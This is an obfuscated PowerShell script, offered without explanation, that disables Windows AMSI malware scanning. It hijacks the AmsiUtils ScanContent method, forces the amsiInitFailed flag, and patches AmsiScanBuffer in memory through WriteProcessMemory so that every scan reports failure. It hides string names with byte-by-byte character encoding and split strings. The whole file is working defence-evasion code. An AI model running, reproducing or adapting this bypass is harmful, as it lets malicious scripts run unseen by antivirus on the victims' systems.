class TrollAMSI{static [int] M([string]$c, [string]$s){return 1}} 
$o = [Ref].Assembly.GetType('System.Ma'+'nag'+'eme'+'nt.Autom'+'ation.A'+'ms'+'iU'+'ti'+'ls').GetMethods('N'+'onPu'+'blic,st'+'at'+'ic') | Where-Object Name -eq ScanContent 
$t = [TrollAMSI].GetMethods() | Where-Object Name -eq 'M' 
#[System.Runtime.CompilerServices.RuntimeHelpers]::PrepareMethod($t.MethodHandle)   
#[System.Runtime.CompilerServices.RuntimeHelpers]::PrepareMethod($o.MethodHandle) 
[System.Runtime.InteropServices.Marshal]::Copy(@([System.Runtime.InteropServices.Marshal]::ReadIntPtr([long]$t.MethodHandle.Value + [long]8)),0, [long]$o.MethodHandle.Value + [long]8,1) 
 
$w = 'System.Management.Automation.A';$c = 'si';$m = 'Utils';$assembly = [Ref].Assembly.GetType(('{0}m{1}{2}' -f $w,$c,$m));$field = $assembly.GetField(('am{0}InitFailed' -f $c),'NonPublic,Static');$field.SetValue($null,$true) 
 
$temtp = 
[char]([bYtE]0x75)+[char]([bYtE]0x73)+[char]([bYtE]0x69)+[char]([bYtE]0x6e)+[char]([bYtE]0x67)+[char]([bYtE]0x20)+[char]([bYtE]0x53)+[char]([bYtE]0x79)+[char]([bYtE]0x73)+[char]([bYtE]0x74)+[char]([bYtE]0x65)+[char]([bYtE]0x6d)+[char]([bYtE]0x3b)+[char]([bYtE]0x0a)+[char]([bYtE]0x75)+[char]([bYtE]0x73)+[char]([bYtE]0x69)+[char]([bYtE]0x6e)+[char]([bYtE]0x67)+[char]([bYtE]0x20)+[char]([bYtE]0x53)+[char]([bYtE]0x79)+[char]([bYtE]0x73)+[char]([bYtE]0x74)+[char]([bYtE]0x65)+[char]([bYtE]0x6d)+[char]([bYtE]0x2e)+[char]([bYtE]0x52)+[char]([bYtE]0x75)+[char]([bYtE]0x6e)+[char]([bYtE]0x74)+[char]([bYtE]0x69)+[char]([bYtE]0x6d)+[char]([bYtE]0x65)+[char]([bYtE]0x2e)+[char]([bYtE]0x49)+[char]([bYtE]0x6e)+[char]([bYtE]0x74)+[char]([bYtE]0x65)+[char]([bYtE]0x72)+[char]([bYtE]0x6f)+[char]([bYtE]0x70)+[char]([bYtE]0x53)+[char]([bYtE]0x65)+[char]([bYtE]0x72)+[char]([bYtE]0x76)+[char]([bYtE]0x69)+[char]([bYtE]0x63)+[char]([bYtE]0x65)+[char]([bYtE]0x73)+[char]([bYtE]0x3b)+[char]([bYtE]0x0a)+[char]([bYtE]0x70)+[char]([bYtE]0x75)+[char]([bYtE]0x62)+[char]([bYtE]0x6c)+[char]([bYtE]0x69)+[char]([bYtE]0x63)+[char]([bYtE]0x20)+[char]([bYtE]0x63)+[char]([bYtE]0x6c)+[char]([bYtE]0x61)+[char]([bYtE]0x73)+[char]([bYtE]0x73)+[char]([bYtE]0x20)+[char]([bYtE]0x74)+[char]([bYtE]0x65)+[char]([bYtE]0x6d)+[char]([bYtE]0x74)+[char]([bYtE]0x70)+[char]([bYtE]0x20)+[char]([bYtE]0x7b)+[char]([bYtE]0x0a)+[char]([bYtE]0x20)+[char]([bYtE]0x20)+[char]([bYtE]0x20)+[char]([bYtE]0x20)+[char]([bYtE]0x5b)+[char]([bYtE]0x44)+[char]([bYtE]0x6c)+[char]([bYtE]0x6c)+[char]([bYtE]0x49)+[char]([bYtE]0x6d)+[char]([bYtE]0x70)+[char]([bYtE]0x6f)+[char]([bYtE]0x72)+[char]([bYtE]0x74)+[char]([bYtE]0x28)+[char]([bYtE]0x22)+[char]([bYtE]0x6b)+[char]([bYtE]0x65)+[char]([bYtE]0x72)+[char]([bYtE]0x6e)+[char]([bYtE]0x65)+[char]([bYtE]0x6c)+[char]([bYtE]0x33)+[char]([bYtE]0x32)+[char]([bYtE]0x22)+[char]([bYtE]0x29)+[char]([bYtE]0x5d)+[char]([bYtE]0x0a)+[char]([bYtE]0x20)+[char]([bYtE]0x20)+[char]([bYtE]0x20)+[char]([bYtE]0x20)+[char]([bYtE]0x70)+[char]([bYtE]0x75)+[char]([bYtE]0x62)+[char]([bYtE]0x6c)+[char]([bYtE]0x69)+[char]([bYtE]0x63)+[char]([bYtE]0x20)+[char]([bYtE]0x73)+[char]([bYtE]0x74)+[char]([bYtE]0x61)+[char]([bYtE]0x74)+[char]([bYtE]0x69)+[char]([bYtE]0x63)+[char]([bYtE]0x20)+[char]([bYtE]0x65)+[char]([bYtE]0x78)+[char]([bYtE]0x74)+[char]([bYtE]0x65)+[char]([bYtE]0x72)+[char]([bYtE]0x6e)+[char]([bYtE]0x20)+[char]([bYtE]0x49)+[char]([bYtE]0x6e)+[char]([bYtE]0x74)+[char]([bYtE]0x50)+[char]([bYtE]0x74)+[char]([bYtE]0x72)+[char]([bYtE]0x20)+[char]([bYtE]0x47)+[char]([bYtE]0x65)+[char]([bYtE]0x74)+[char]([bYtE]0x50)+[char]([bYtE]0x72)+[char]([bYtE]0x6f)+[char]([bYtE]0x63)+[char]([bYtE]0x41)+[char]([bYtE]0x64)+[char]([bYtE]0x64)+[char]([bYtE]0x72)+[char]([bYtE]0x65)+[char]([bYtE]0x73)+[char]([bYtE]0x73)+[char]([bYtE]0x28)+[char]([bYtE]0x49)+[char]([bYtE]0x6e)+[char]([bYtE]0x74)+[char]([bYtE]0x50)+[char]([bYtE]0x74)+[char]([bYtE]0x72)+[char]([bYtE]0x20)+[char]([bYtE]0x68)+[char]([bYtE]0x4d)+[char]([bYtE]0x6f)+[char]([bYtE]0x64)+[char]([bYtE]0x75)+[char]([bYtE]0x6c)+[char]([bYtE]0x65)+[char]([bYtE]0x2c)+[char]([bYtE]0x20)+[char]([bYtE]0x73)+[char]([bYtE]0x74)+[char]([bYtE]0x72)+[char]([bYtE]0x69)+[char]([bYtE]0x6e)+[char]([bYtE]0x67)+[char]([bYtE]0x20)+[char]([bYtE]0x70)+[char]([bYtE]0x72)+[char]([bYtE]0x6f)+[char]([bYtE]0x63)+[char]([bYtE]0x4e)+[char]([bYtE]0x61)+[char]([bYtE]0x6d)+[char]([bYtE]0x65)+[char]([bYtE]0x29)+[char]([bYtE]0x3b)+[char]([bYtE]0x0a)+[char]([bYtE]0x20)+[char]([bYtE]0x20)+[char]([bYtE]0x20)+[char]([bYtE]0x20)+[char]([bYtE]0x5b)+[char]([bYtE]0x44)+[char]([bYtE]0x6c)+[char]([bYtE]0x6c)+[char]([bYtE]0x49)+[char]([bYtE]0x6d)+[char]([bYtE]0x70)+[char]([bYtE]0x6f)+[char]([bYtE]0x72)+[char]([bYtE]0x74)+[char]([bYtE]0x28)+[char]([bYtE]0x22)+[char]([bYtE]0x6b)+[char]([bYtE]0x65)+[char]([bYtE]0x72)+[char]([bYtE]0x6e)+[char]([bYtE]0x65)+[char]([bYtE]0x6c)+[char]([bYtE]0x33)+[char]([bYtE]0x32)+[char]([bYtE]0x22)+[char]([bYtE]0x29)+[char]([bYtE]0x5d)+[char]([bYtE]0x0a)+[char]([bYtE]0x20)+[char]([bYtE]0x20)+[char]([bYtE]0x20)+[char]([bYtE]0x20)+[char]([bYtE]0x70)+[char]([bYtE]0x75)+[char]([bYtE]0x62)+[char]([bYtE]0x6c)+[char]([bYtE]0x69)+[char]([bYtE]0x63)+[char]([bYtE]0x20)+[char]([bYtE]0x73)+[char]([bYtE]0x74)+[char]([bYtE]0x61)+[char]([bYtE]0x74)+[char]([bYtE]0x69)+[char]([bYtE]0x63)+[char]([bYtE]0x20)+[char]([bYtE]0x65)+[char]([bYtE]0x78)+[char]([bYtE]0x74)+[char]([bYtE]0x65)+[char]([bYtE]0x72)+[char]([bYtE]0x6e)+[char]([bYtE]0x20)+[char]([bYtE]0x49)+[char]([bYtE]0x6e)+[char]([bYtE]0x74)+[char]([bYtE]0x50)+[char]([bYtE]0x74)+[char]([bYtE]0x72)+[char]([bYtE]0x20)+[char]([bYtE]0x4c)+[char]([bYtE]0x6f)+[char]([bYtE]0x61)+[char]([bYtE]0x64)+[char]([bYtE]0x4c)+[char]([bYtE]0x69)+[char]([bYtE]0x62)+[char]([bYtE]0x72)+[char]([bYtE]0x61)+[char]([bYtE]0x72)+[char]([bYtE]0x79)+[char]([bYtE]0x28)+[char]([bYtE]0x73)+[char]([bYtE]0x74)+[char]([bYtE]0x72)+[char]([bYtE]0x69)+[char]([bYtE]0x6e)+[char]([bYtE]0x67)+[char]([bYtE]0x20)+[char]([bYtE]0x6e)+[char]([bYtE]0x61)+[char]([bYtE]0x6d)+[char]([bYtE]0x65)+[char]([bYtE]0x29)+[char]([bYtE]0x3b)+[char]([bYtE]0x0a)+[char]([bYtE]0x20)+[char]([bYtE]0x20)+[char]([bYtE]0x20)+[char]([bYtE]0x20)+[char]([bYtE]0x5b)+[char]([bYtE]0x44)+[char]([bYtE]0x6c)+[char]([bYtE]0x6c)+[char]([bYtE]0x49)+[char]([bYtE]0x6d)+[char]([bYtE]0x70)+[char]([bYtE]0x6f)+[char]([bYtE]0x72)+[char]([bYtE]0x74)+[char]([bYtE]0x28)+[char]([bYtE]0x22)+[char]([bYtE]0x6b)+[char]([bYtE]0x65)+[char]([bYtE]0x72)+[char]([bYtE]0x6e)+[char]([bYtE]0x65)+[char]([bYtE]0x6c)+[char]([bYtE]0x33)+[char]([bYtE]0x32)+[char]([bYtE]0x22)+[char]([bYtE]0x29)+[char]([bYtE]0x5d)+[char]([bYtE]0x0a)+[char]([bYtE]0x20)+[char]([bYtE]0x20)+[char]([bYtE]0x20)+[char]([bYtE]0x20)+[char]([bYtE]0x70)+[char]([bYtE]0x75)+[char]([bYtE]0x62)+[char]([bYtE]0x6c)+[char]([bYtE]0x69)+[char]([bYtE]0x63)+[char]([bYtE]0x20)+[char]([bYtE]0x73)+[char]([bYtE]0x74)+[char]([bYtE]0x61)+[char]([bYtE]0x74)+[char]([bYtE]0x69)+[char]([bYtE]0x63)+[char]([bYtE]0x20)+[char]([bYtE]0x65)+[char]([bYtE]0x78)+[char]([bYtE]0x74)+[char]([bYtE]0x65)+[char]([bYtE]0x72)+[char]([bYtE]0x6e)+[char]([bYtE]0x20)+[char]([bYtE]0x49)+[char]([bYtE]0x6e)+[char]([bYtE]0x74)+[char]([bYtE]0x50)+[char]([bYtE]0x74)+[char]([bYtE]0x72)+[char]([bYtE]0x20)+[char]([bYtE]0x57)+[char]([bYtE]0x72)+[char]([bYtE]0x69)+[char]([bYtE]0x74)+[char]([bYtE]0x65)+[char]([bYtE]0x50)+[char]([bYtE]0x72)+[char]([bYtE]0x6f)+[char]([bYtE]0x63)+[char]([bYtE]0x65)+[char]([bYtE]0x73)+[char]([bYtE]0x73)+[char]([bYtE]0x4d)+[char]([bYtE]0x65)+[char]([bYtE]0x6d)+[char]([bYtE]0x6f)+[char]([bYtE]0x72)+[char]([bYtE]0x79)+[char]([bYtE]0x28)+[char]([bYtE]0x49)+[char]([bYtE]0x6e)+[char]([bYtE]0x74)+[char]([bYtE]0x50)+[char]([bYtE]0x74)+[char]([bYtE]0x72)+[char]([bYtE]0x20)+[char]([bYtE]0x68)+[char]([bYtE]0x50)+[char]([bYtE]0x72)+[char]([bYtE]0x6f)+[char]([bYtE]0x63)+[char]([bYtE]0x65)+[char]([bYtE]0x73)+[char]([bYtE]0x73)+[char]([bYtE]0x2c)+[char]([bYtE]0x20)+[char]([bYtE]0x49)+[char]([bYtE]0x6e)+[char]([bYtE]0x74)+[char]([bYtE]0x50)+[char]([bYtE]0x74)+[char]([bYtE]0x72)+[char]([bYtE]0x20)+[char]([bYtE]0x6c)+[char]([bYtE]0x70)+[char]([bYtE]0x42)+[char]([bYtE]0x61)+[char]([bYtE]0x73)+[char]([bYtE]0x65)+[char]([bYtE]0x41)+[char]([bYtE]0x64)+[char]([bYtE]0x64)+[char]([bYtE]0x72)+[char]([bYtE]0x65)+[char]([bYtE]0x73)+[char]([bYtE]0x73)+[char]([bYtE]0x2c)+[char]([bYtE]0x20)+[char]([bYtE]0x62)+[char]([bYtE]0x79)+[char]([bYtE]0x74)+[char]([bYtE]0x65)+[char]([bYtE]0x5b)+[char]([bYtE]0x5d)+[char]([bYtE]0x20)+[char]([bYtE]0x6c)+[char]([bYtE]0x70)+[char]([bYtE]0x42)+[char]([bYtE]0x75)+[char]([bYtE]0x66)+[char]([bYtE]0x66)+[char]([bYtE]0x65)+[char]([bYtE]0x72)+[char]([bYtE]0x2c)+[char]([bYtE]0x20)+[char]([bYtE]0x69)+[char]([bYtE]0x6e)+[char]([bYtE]0x74)+[char]([bYtE]0x20)+[char]([bYtE]0x64)+[char]([bYtE]0x77)+[char]([bYtE]0x53)+[char]([bYtE]0x69)+[char]([bYtE]0x7a)+[char]([bYtE]0x65)+[char]([bYtE]0x2c)+[char]([bYtE]0x20)+[char]([bYtE]0x72)+[char]([bYtE]0x65)+[char]([bYtE]0x66)+[char]([bYtE]0x20)+[char]([bYtE]0x69)+[char]([bYtE]0x6e)+[char]([bYtE]0x74)+[char]([bYtE]0x20)+[char]([bYtE]0x6c)+[char]([bYtE]0x70)+[char]([bYtE]0x4e)+[char]([bYtE]0x75)+[char]([bYtE]0x6d)+[char]([bYtE]0x62)+[char]([bYtE]0x65)+[char]([bYtE]0x72)+[char]([bYtE]0x4f)+[char]([bYtE]0x66)+[char]([bYtE]0x42)+[char]([bYtE]0x79)+[char]([bYtE]0x74)+[char]([bYtE]0x65)+[char]([bYtE]0x73)+[char]([bYtE]0x57)+[char]([bYtE]0x72)+[char]([bYtE]0x69)+[char]([bYtE]0x74)+[char]([bYtE]0x74)+[char]([bYtE]0x65)+[char]([bYtE]0x6e)+[char]([bYtE]0x29)+[char]([bYtE]0x3b)+[char]([bYtE]0x0a)+[char]([bYtE]0x20)+[char]([bYtE]0x20)+[char]([bYtE]0x20)+[char]([bYtE]0x20)+[char]([bYtE]0x5b)+[char]([bYtE]0x44)+[char]([bYtE]0x6c)+[char]([bYtE]0x6c)+[char]([bYtE]0x49)+[char]([bYtE]0x6d)+[char]([bYtE]0x70)+[char]([bYtE]0x6f)+[char]([bYtE]0x72)+[char]([bYtE]0x74)+[char]([bYtE]0x28)+[char]([bYtE]0x22)+[char]([bYtE]0x6b)+[char]([bYtE]0x65)+[char]([bYtE]0x72)+[char]([bYtE]0x6e)+[char]([bYtE]0x65)+[char]([bYtE]0x6c)+[char]([bYtE]0x33)+[char]([bYtE]0x32)+[char]([bYtE]0x22)+[char]([bYtE]0x29)+[char]([bYtE]0x5d)+[char]([bYtE]0x0a)+[char]([bYtE]0x20)+[char]([bYtE]0x20)+[char]([bYtE]0x20)+[char]([bYtE]0x20)+[char]([bYtE]0x70)+[char]([bYtE]0x75)+[char]([bYtE]0x62)+[char]([bYtE]0x6c)+[char]([bYtE]0x69)+[char]([bYtE]0x63)+[char]([bYtE]0x20)+[char]([bYtE]0x73)+[char]([bYtE]0x74)+[char]([bYtE]0x61)+[char]([bYtE]0x74)+[char]([bYtE]0x69)+[char]([bYtE]0x63)+[char]([bYtE]0x20)+[char]([bYtE]0x65)+[char]([bYtE]0x78)+[char]([bYtE]0x74)+[char]([bYtE]0x65)+[char]([bYtE]0x72)+[char]([bYtE]0x6e)+[char]([bYtE]0x20)+[char]([bYtE]0x49)+[char]([bYtE]0x6e)+[char]([bYtE]0x74)+[char]([bYtE]0x50)+[char]([bYtE]0x74)+[char]([bYtE]0x72)+[char]([bYtE]0x20)+[char]([bYtE]0x47)+[char]([bYtE]0x65)+[char]([bYtE]0x74)+[char]([bYtE]0x43)+[char]([bYtE]0x75)+[char]([bYtE]0x72)+[char]([bYtE]0x72)+[char]([bYtE]0x65)+[char]([bYtE]0x6e)+[char]([bYtE]0x74)+[char]([bYtE]0x50)+[char]([bYtE]0x72)+[char]([bYtE]0x6f)+[char]([bYtE]0x63)+[char]([bYtE]0x65)+[char]([bYtE]0x73)+[char]([bYtE]0x73)+[char]([bYtE]0x28)+[char]([bYtE]0x29)+[char]([bYtE]0x3b)+[char]([bYtE]0x0a)+[char]([bYtE]0x20)+[char]([bYtE]0x20)+[char]([bYtE]0x20)+[char]([bYtE]0x20)+[char]([bYtE]0x70)+[char]([bYtE]0x75)+[char]([bYtE]0x62)+[char]([bYtE]0x6c)+[char]([bYtE]0x69)+[char]([bYtE]0x63)+[char]([bYtE]0x20)+[char]([bYtE]0x73)+[char]([bYtE]0x74)+[char]([bYtE]0x61)+[char]([bYtE]0x74)+[char]([bYtE]0x69)+[char]([bYtE]0x63)+[char]([bYtE]0x20)+[char]([bYtE]0x69)+[char]([bYtE]0x6e)+[char]([bYtE]0x74)+[char]([bYtE]0x20)+[char]([bYtE]0x62)+[char]([bYtE]0x79)+[char]([bYtE]0x74)+[char]([bYtE]0x65)+[char]([bYtE]0x73)+[char]([bYtE]0x57)+[char]([bYtE]0x72)+[char]([bYtE]0x69)+[char]([bYtE]0x74)+[char]([bYtE]0x74)+[char]([bYtE]0x65)+[char]([bYtE]0x6e)+[char]([bYtE]0x20)+[char]([bYtE]0x3d)+[char]([bYtE]0x20)+[char]([bYtE]0x30)+[char]([bYtE]0x3b)+[char]([bYtE]0x0a)+[char]([bYtE]0x7d) 
Add-Type $temtp 
$djmzicg = [temtp]::LoadLibrary("$([char]([bYtE]0x61)+[cHaR]([ByTE]0x6d)+[cHAr](115*101/101)+[ChAR](105*60/60)+[cHAR](46+19-19)+[chAr](29+71)+[cHar]([BYtE]0x6c)+[cHAR]([BYtE]0x6c))") 
$rttngq = [temtp]::GetProcAddress($djmzicg, "$(('Ámsî'+'Scàn'+'Buff'+'er').NORmAlIzE([cHaR](70)+[cHAr](111+39-39)+[chAR]([BYtE]0x72)+[cHaR]([bytE]0x6d)+[Char](68+34-34)) -replace [cHar](92*33/33)+[CHar](112+96-96)+[chAR]([BYte]0x7b)+[ChAr](77*44/44)+[ChAR]([bYtE]0x6e)+[cHar](125*73/73))") 
$askjnfd = [temtp]::GetCurrentProcess() 
[Int32]$lpNumberOfBytesWritten = 0 
$wdyo = "0xB8" 
$tsso = "0x57" 
$gygu = "0x00" 
$vjrb = "0x07" 
$pkam = "0x80" 
$pmva = "0xC3" 
$eoukm = [Byte[]] ($wdyo,$tsso,$gygu,$vjrb,+$pkam,+$pmva) 
[temtp]::WriteProcessMemory($askjnfd, $rttngq, $eoukm,6,[ref]$lpNumberOfBytesWritten) 
 